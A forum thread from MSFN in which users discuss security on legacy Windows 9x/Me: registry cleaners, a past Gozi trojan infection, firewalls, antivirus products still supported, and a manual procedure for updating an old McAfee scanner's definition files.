• Announcements

    • xper

      MSFN Sponsorship and AdBlockers!   07/10/2016

      Dear members, MSFN is made available via subscriptions, donations and advertising revenue. The use of ad-blocking software hurts the site. Please disable ad-blocking software or set an exception for MSFN. Alternatively, become a site sponsor and ads will be disabled automatically and by subscribing you get other sponsor benefits.
loblo

Windows 9x/Me Security Thread

114 posts in this topic

I tried using Eusing Free Registry Cleaner and all it did was delete a bunch of "un-used" file extensions like .zip, .bmp, .jpg and other important file associations... Basically all Eusing did was screw up my computer.
I usually don't try out old little-known Win98 stuff without the recommendation by somebody of authority (like members of msfn.org :) ), unless I am searching for something very specific and after having done some research on my own. In any case, it's good to hear which old can of worms one should definitely not open.

My system is very well backed up, and an opsys restore to the exact state prior to the testing takes me about 10-20 minutes, so if something looks good, I may wind up trying it out.

0

Share this post


Link to post
Share on other sites

Jetico blocked the gozi trojan from accessing the network for fetching some other files when it was still a zero-day and went undetected by my then real time antivirus.

According to this: http://www.secureworks.com/research/threats/gozi/ the exploit that was used to transfer gozi to your computer used a hidden iframe containing "JavaScript code using XMLHTTP and ADODB (ActiveX Data Objects) functions to download and run an EXE file which was hosted on the same server". This likely happened no earlier than December 2006, and more likely during the first half of 2007.

I think that for gozi to infect a system, the system must have the MS04-025 (Navigation Method Cross-Domain) vulnerability. This would have been patched as part of an IE 5.5 or IE6 cumulative update for various versions of Windows (including win-98 I believe). You would also have to be using IE for your browser and would have browsed to one of an estimated 2000 hijacked servers that were serving up the hidden iFrame containing the Javascript exploit code. And I'm really not convinced that the gozi infector or loader would have successfully launched itself and operated properly if it found itself on a win-9x system in the first place.

Would you by chance have been running a dual-boot win-98/XP system back during the first half of 2007?

0

Share this post


Link to post
Share on other sites

As I've said I got Gozi on my machine through an Internet Explorer javascript/activeX exploit and the details you copy/pasted about it are most certainly correct.

I got infected beginning of February 2007 I believe and FWIW I also believe I have been the first person in the world to post about it in forums and from what I had been told by phone afterwards by a guy claiming to be an IT security journalist who first contacted me about it by PM, the gozi virus was already known by major software security companies but none had published anything about it or had any signatures for it yet

And no I wasn't running a dual boot system, only Windows ME and, as I have already said, even if you don't believe it for whatever reason, Jetico succesfully blocked a first executable from downloading another one, which means it was actually running without crashing on my machine.

I also got infected by a rootkit once, it was nearly undetectable, invisible file, invisible process and invisible registry startup key. Yes there are rootkits for Win 9x as well... :w00t:

Edited by loblo
0

Share this post


Link to post
Share on other sites

I tried using Eusing Free Registry Cleaner and all it did was delete a bunch of "un-used" file extensions like .zip, .bmp, .jpg and other important file associations.

So then I had to re-associate all those file extensions with the correct programs. Basically all Eusing did was screw up my computer.

The only registry cleaner I use is the one inside CCleaner.

All registry cleaners should be used with caution. CCleaner isn't foolproof either, as it listed registry entries that I know are in use. They should be used as a guide while manually cleaning the registry. Since it's really tedious to often check every nook and cranny of the registry by hand, I find that these can aide in that area. Always review what they've found first before allowing them to delete any entry, and always backup before committing the removal. I personally use Eusing Free Registry Cleaner as part of my registry cleaning toolkit, along with a few others (a second or third or fourth opinion is always nice), and it has been working fine for me.

One thing I never liked about registry cleaners is the way they often refer to the detected entries, "215 errors found"... issues/problems/etc. It should be more like "215 possible unused entries, remove only if you are sure of what you're doing." And beware of registry cleaners that detects an exorbitant number of entries, "2154 errors found." :rolleyes: Why not just flag the entire hive while you're at it?

0

Share this post


Link to post
Share on other sites
And beware of registry cleaners that detects an exorbitant number of entries, "2154 errors found." :rolleyes:

I am not sure you really know what you are talking about... :rolleyes:

0

Share this post


Link to post
Share on other sites

I am not sure you really know what you are talking about... :rolleyes:

I admit I was exaggerating for effect. I experimented with many registry cleaners, and some detect significantly more "errors" than others by a wide margin, a very wide margin. Unfortunately, inexperienced users can be fooled by those inflated numbers, thinking that certain cleaners are more thorough, when they're really increasing the chances of a corrupt registry.

0

Share this post


Link to post
Share on other sites

With most support for Win 9x antivirus and antimalware programs coming to an end, I try to keep an eye on some that are still supported.

Kaspersky 6.0.2.621 virus definitions will be provided until October 2012.

Avast 4.8.1335 virus definitions will be provided until May 2012.

Eset NOD32 2.70.39 virus definitions will be provided until February 2012.

AVG 7.5.557 support has officially ended. Their definitions continue to work, but compatibility could end at any time.

Spybot 1.6.2 is currently supported, but with Beta 2.0 available and quite overdue, it could end soon.

SpywareBlaster 4.4 is currently supported. No sign of when that may end.

2012 is the magic year. Like Multibooter, I suggest downloading and archiving definitions while we still can so at the very least we'll have the most recent version that can still be used years from now when all support has finally ceased.

Edited for clarity

Edited by Foxbat
0

Share this post


Link to post
Share on other sites

With most support for Win 9x antivirus and antimalware programs coming to an end, I try to keep an eye on some that are still supported.

Norton Anti-Virus 2002 can still be updated by downloading the (free) Symantec Intelligent Updater package.

If you once had NAV 2002 on your system, or if you've uninstalled it completely (including deleting the file catalog.livesubscribe) then you can re-install it and it will accept new virus definition updates (from the intelligent updater package) for a year.

0

Share this post


Link to post
Share on other sites
If you once had NAV 2002 on your system, or if you've uninstalled it completely (including deleting the file catalog.livesubscribe) then you can re-install it and it will accept new virus definition updates (from the intelligent updater package) for a year.
You are aware that there's a "cleanwipe" program made by Symantec to clean remnants of any NAV/NIS in preparation for SEP? I haven't tested it with NAV2002 but it works fine with later versions.

On topic, there's already a topic on firewalls. I had recommended Outpost (see post #33 and #40 for links and info).

0

Share this post


Link to post
Share on other sites
You are aware that there's a "cleanwipe" program made by Symantec to clean remnants of any NAV/NIS in preparation for SEP? I haven't tested it with NAV2002 but it works fine with later versions.

NAV 2002 doesn't really require special utilities to uninstall or remove it from your system (it's not that complicated or invasive in that regard). But I agree that later versions do require such utilities. But even then I doubt that the file "catalog.livesubscribe" gets removed by any method - you normally have to remove that manually. Unless you remove that file, you can't re-install NAV such that you reset the 1-year virus-definition update clock.

0

Share this post


Link to post
Share on other sites

Avast 4.8.1335 will be supported until May 2012.

Thanks. I was wondering when Avast! was going to discontinue support for Win9x as it was originally supposed to end last year. Just curious, where did you find that information?

I'm kinda surprised herbalist hasn't joined the discussion but this topic gets periodically rehashed over and over. It's too bad there isn't some good way to consolidate all of the information.

0

Share this post


Link to post
Share on other sites

Of course there is a way... I can consolidate the previous threads into one. But that would create a huge thread.

So I don't know for sure whether it's such a good idea. Do please post a list of previous threads you think would fit in.

Then we can decide what's the best course to adopt.

0

Share this post


Link to post
Share on other sites

Avast 4.8.1335 will be supported until May 2012.

Thanks. I was wondering when Avast! was going to discontinue support for Win9x as it was originally supposed to end last year. Just curious, where did you find that information?

Yes, Win 9x support ended at the end of 2009. I was referring to the support of virus definitions. I'll fix my post to reflect that.

0

Share this post


Link to post
Share on other sites

Well, this thread gave me an excuse to tie up an old loose-end, to see if my old McAfee v6 scanner is still working on Win9x with the latest DATs. I haven't tried this in quite a while since I have other computers configured for AV security functions, mostly WinXP which crashes less and is quicker to recover from a BSOD.

First, I should mention that I never allow these things to auto-update or even to update DATs, I was never interested in realtime protection or letting them automatically update engines or DATs. Instead, I always backed up the previous working DATs and then manually extract the *latest* available DATs and then place the files where they belong. This allows me to fall back to the previous set in the case of a McAfee screwup.

Secondly, and more importantly, this McAfee installation had been highly tamed. Every part unrelated to ON-DEMAND scanning was removed. There was a ton of registry editing, killing all autostart entries and drivers, removing 99% of the MSI Windows Installer references, associations and hooks. Essentially it has been neutered so that it never ran unless I right-clicked a folder and selected the McAfee shell/folder registry entry I made.

The executable McAfee file is VSMAIN.EXE and shows v6.01.2000.1 dated: 2001-11-16.

The two McAfee FTP sites I located are:

ftp://ftp.mcafee.com/pub/antivirus/superdat/intel/

ftp://ftp.mcafee.com/pub/datfiles/english/

Giving me three total files to download:

ftp://ftp.mcafee.com/pub/datfiles/english/avvdat-6346.tar

ftp://ftp.mcafee.com/pub/antivirus/superdat/intel/sdat6346.exe

ftp://ftp.mcafee.com/pub/antivirus/superdat/intel/6346xdat.exe

Man, they are really getting very large these days:

- 111,632,528 . 05-15-11 . 2:03a 6346xdat.exe <------- use /e to extract

- 109,750,272 . 05-15-11 . 2:05a Avvdat-6346.tar <---- just use WinZip

- 117,434,304 . 05-15-11 . 2:05a Sdat6346.exe <------- use /e to extract

Here they are extracted into folders. Note, all the extra hyphens or dots are to keep the columns aligned. The style sheet for this forum software insists on collapsing multiple spaces into one, there seems to be no way to imply the <PRE> tag.

;----------- Avvdat-6346(.tar)

..... 569,961 . 05-14-11 . 1:40a Avvclean.dat

..... 423,049 . 05-14-11 . 1:40a Avvnames.dat

. 108,744,302 . 05-14-11 . 1:40a Avvscan.dat

....... 8,689 . 05-14-11 . 1:40a Legal.txt

;----------- 6346xdat(.exe)

..... 569,961 . 05-14-11 . 6:40a Avvclean.dat <=== IDENTICAL to Avvdat-6346.tar

..... 423,049 . 05-14-11 . 6:40a Avvnames.dat <=== IDENTICAL to Avvdat-6346.tar

. 108,744,302 . 05-14-11 . 6:40a Avvscan.dat <==== IDENTICAL to Avvdat-6346.tar

......... 783 . 05-14-11 . 3:50a Globals.nsg

..... 157,696 . 05-14-11 . 3:50a Gsdsuper.dll

...... 34,644 . 05-14-11 .12:07p Naiscrip.nsc

......... 401 . 05-14-11 . 3:50a Sdatpack.lst

;----------- Sdat6346(.exe)

..... 569,961 . 05-14-11 . 6:40a Avvclean.dat <=== IDENTICAL to Avvdat-6346.tar

..... 423,049 . 05-14-11 . 6:40a Avvnames.dat <=== IDENTICAL to Avvdat-6346.tar

. 108,744,302 . 05-14-11 . 6:40a Avvscan.dat <==== IDENTICAL to Avvdat-6346.tar

....... 5,644 . 07-31-09 . 6:40a Config.dat

......... 783 . 05-14-11 . 3:50a Globals.nsg

..... 157,696 . 05-14-11 . 3:50a Gsdsuper.dll

..... 159,744 . 07-31-09 . 6:40a Mcprodinfo.exe

... 3,182,712 . 07-31-09 . 6:40a Mcscan32.dll ... (engine) IDENTICAL to existing

... 4,706,936 . 07-31-09 . 6:40a Mscan64a.dll

...... 93,794 . 05-14-11 .12:07p Naiscrip.nsc

......... 562 . 05-14-11 . 3:50a Sdatpack.lst

....... 7,842 . 07-31-09 . 6:40a Signlic.txt

....... 5,644 . 07-31-09 . 6:40a __X64_Config.dat

....... 7,842 . 07-31-09 . 6:40a __X64_Signlic.txt

....... 1,056 . 07-31-09 . 6:40a __X64_License.dat

So it looks like you only need to download that one TAR file to get the current DATs, the pertinent files are identical, the superfluous files are unnecessary.

First I determined that the target location for the DATs and Engine is in here:

<YourPath>\McAfee\Network Associates\Virusscan Engine\4.0.xx

Then I compared the Mcscan32.dll from Sdat6346.exe against the existing old one and they are still identical. Cool!

So I grabbed the three DAT files and realized that they are using new names these days with 'AVV' prepended, so first I had to rename them ...

..... 569,961 . 05-14-11 . 1:40a Avvclean.dat RENAME TO: Clean.dat

..... 423,049 . 05-14-11 . 1:40a Avvnames.dat RENAME TO: Names.dat

. 108,744,302 . 05-14-11 . 1:40a Avvscan.dat .RENAME TO: Scan.dat

Then off they go into the above-mentioned folder.

Ok, fire up McAfee v6 by rightclicking a test folder. Note, this step from click to the McAfee GUI took a loooonnnng time, at least 5 minutes! Whatever.

Finally ... "Security Status" page shows this ...

Virus Definitions: 4.0.6346

Created On: 05/14/2011

Bingo! They were recognized. I let it scan the folder (fast as ever). Success! on this ten-year old engine.

Hope this is good news for somebody.

0

Share this post


Link to post
Share on other sites

Avast 4.8.1335 will be supported until May 2012.

Thanks. I was wondering when Avast! was going to discontinue support for Win9x as it was originally supposed to end last year. Just curious, where did you find that information?

Yes, Win 9x support ended at the end of 2009. I was referring to the support of virus definitions. I'll fix my post to reflect that.

@Foxbat:

I understood what you meant. I was also referring to virus definitions support, which was supposed to be discontinued at the end of 2010 but has surprisingly still continued.

Of course there is a way... I can consolidate the previous threads into one. But that would create a huge thread.

So I don't know for sure whether it's such a good idea. Do please post a list of previous threads you think would fit in.

Then we can decide what's the best course to adopt.

@dencorso:

Thanks. Now that I think about it, seems like you did something similar for the "Large HDDs >137 GB" topic where you created a "super" post with links to all the relevant threads. I'll look for those threads and get back to you.

@CharlotteTheHarlot:

That's interesting that McAfee 6 still works with the latest definitions. My first AV was McAfee 4.0.3 and I used it for an extremely long time, updating it with the sdat files you referenced, until it became way too slow. As I recall, it caused overall system response to become so sluggish as to be almost unusable. Along the way, they also provided a free download of version 8 to settle some class action lawsuit. I tried it but didn't like it for some reason.

Edited by Prozactive
0

Share this post


Link to post
Share on other sites

I understood what you meant. I was also referring to virus definitions support, which was supposed to be discontinued at the end of 2010 but has surprisingly still continued.

The source of the definitions support date was directly from Avast's website over a year ago. Now, a Google search brings up multiple forums all referring to one user asking an Avast rep whose response was that definitions will be supported until the end of 2010. This causes some confusion. It's possible Avast may have changed the date somewhere down the line, but they are still releasing updated 4.8 definitions from their website, which is concurrent with their original end date.

0

Share this post


Link to post
Share on other sites

Holy heck i'm floored i didn't think any of the outdated A/Vs could get updates i had thought of getting an older yet some what recent A/v but, never really put any more thought to it. i use WOT in palemoon witch i have version specialized for Pentium 3's and if you don't know palemoon is windows optimized version of FF. any i didn't think there was anything left for 98se might be interesting to scan it some time but, for the most part i don't have or run any thing as far as A/v i'm sure it helps with performance some.

0

Share this post


Link to post
Share on other sites

ClamWin AV .97.1 has been released. It's not noted in the change log but this update has added QRecover support for Win98 and WinME. QRecover (a ClamWin utility aka Quarantine Browser) allows users to easily restore files from quarantine, if necessary.

http://www.filehippo.com/download_clamwin

This new version works great with Clam Sentinel 1.16, which acts as it's integrated real time front end.

Edit: adding ClamWin Portable .97.1 (states for Win2k and higher, but works on Win98 and probably WinME without KernelEx). Can be used in conjunction with Clam Sentinel from a flash drive. See the two guides at the bottom of http://clamsentinel.sourceforge.net for setup procedures. Also, I could never get ClamWin (installed or portable) to scan a NTFS volume even with Paragon's NTFS for Win98 installed. My remedy was to re-format the NTFS drive to FAT32. This is a ClamWin problem, not Clam Sentinel.

Edited by Lipper
0

Share this post


Link to post
Share on other sites

Editing a post doesn't bump a thread on this forum, so I'm manually bumping that others will know there's new content. :thumbup

0

Share this post


Link to post
Share on other sites

That's expected the older an OS gets. But, two antivirus programs still support Windows 95:

Avast 4.8

Eset NOD32 2.7

See post #32 for support dates.

0

Share this post


Link to post
Share on other sites

... 3,182,712 . 07-31-09 . 6:40a Mcscan32.dll ... (engine) IDENTICAL to existing

What version is your Mscan32.dll?

Does anyone have access to 5100eng9x.exe?

Edited by PROBLEMCHYLD
0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.